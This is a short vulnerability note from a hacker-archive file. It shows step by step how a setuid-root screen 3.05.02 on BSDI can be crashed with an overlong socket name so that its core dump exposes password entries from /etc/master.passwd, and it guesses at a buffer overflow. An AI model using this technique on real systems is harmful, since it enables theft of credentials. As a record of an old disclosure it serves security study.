home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / screen.txt < prev    next >
Encoding:
Text File  |  2001-11-06  |  2.3 KB  |  53 lines
  1. The program under question is /usr/contrib/bin/screen (BSDI).  This is
  2. screen version 3.05.02 and is installed setuid root, as it is "supposed"
  3. to be.  Here is a demonstration:
  4.  
  5. $ screen
  6.  
  7. Screen version 3.05.02 (FAU) 19-Aug-93
  8.  
  9. Copyright (c) 1993 Juergen Weigert, Michael Schroeder
  10. Copyright (c) 1987 Oliver Laumann
  11.  
  12. This program is free software; you can redistribute it and/or modify it under
  13. the terms of the GNU General Public License as published by the Free Software
  14. Foundation; either version 2, or (at your option) any later version.
  15.  
  16. This program is distributed in the hope that it will be useful, but WITHOUT
  17. ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  18. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  19.  
  20. You should have received a copy of the GNU General Public License along with
  21. this program (see the file COPYING); if not, write to the Free Software
  22. Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  23.  
  24. Send bugreports, fixes, enhancements, t-shirts, money, beer & pizza to
  25. screen@uni-erlangen.de (bah.. send them to Bugtraq!)
  26.  
  27.                         [Press Space or Return to end.]
  28.  
  29. $ screen
  30.  
  31. $ cd /tmp/screens/S-khelbin
  32. $ ls
  33. 246.ttyp7.comet
  34. $ mv 246.ttyp* 246.ttyp7.cometanonymousanonymousanonymousanonymous\
  35. > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous\
  36. > anonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
  37. $ screen -ls
  38. /tmp/screens/S-khelbin/246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous: connect: Invalid argument
  39. %1     278 Abort - core dumped  screen -ls
  40. $ ls -l
  41. total 176
  42. srwx------  1 khelbin  khelbin       0 Feb 15 21:33 246.ttyp7.cometanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymousanonymous
  43. -rw-r--r--  1 khelbin  khelbin  172032 Feb 15 21:33 core.screen
  44. $ strings core.screen|less
  45.  
  46.  
  47. The core.screen file contains unencrypted password strings from
  48. /etc/master.passwd, which of course, should not be readable by me.  I'm
  49. also sure there's a buffer-overflow here but I havn't had as much time as
  50. I would like to to look through the source yet.
  51.  
  52.  
  53.